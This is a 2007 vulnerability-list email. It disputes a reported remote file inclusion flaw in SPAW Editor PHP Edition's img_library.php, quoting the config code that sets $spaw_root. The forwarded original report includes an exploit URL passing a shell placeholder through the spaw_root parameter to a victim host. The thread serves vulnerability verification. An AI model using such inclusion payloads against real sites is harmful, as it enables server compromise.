[VIM] [Fwd: SPAW Editor PHP Edition]
Ferdy Riphagen
f.riphagen at nsec.nl
Fri Mar 2 15:14:21 EST 2007
The file mentioned here is only a patch.
img_library,php contains:
// include wysiwyg config
include '../config/spaw_control.config.php';
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';
With a install you have to rename
"../config/spaw_control.default.config.php" to
"../config/spaw_control.config.php"
spaw_control.config.php contains:
// calculate root folder for spaw files
$spaw_root = realpath(dirname(__FILE__)."/..");
$spaw_root = str_replace("\\","/",$spaw_root);
if (!ereg('/$', $spaw_root))
$spaw_root = $spaw_root."/";
The patch is for the "zend_hash_del_key_or_index" vulnerability by using
the hashes for "spaw_imglib_include" (-86707544, -411170602)
--Ferdy--
-------- Original Message --------
Remote IInclude File : SPAW Editor PHP Edition upgrade version 1.2.3 to 1.2.4
Discovered By : Hasadya Raed
Contact Me : RaeD[at]BsdMail[dot]Com
Download Script:
http://heanet.dl.sourceforge.net/sourceforge/spaw/spaw-php-123-to-124.zip
B.File :img_library.php :
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';
=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
Expl:-http://www.victim.com/spaw/dialogs/img_library.php?spaw_root=[Shell-AttacK]
By Hasadya Raed
--
_______________________________________________
Get your free email from http://bsdmail.com
More information about the VIM
mailing list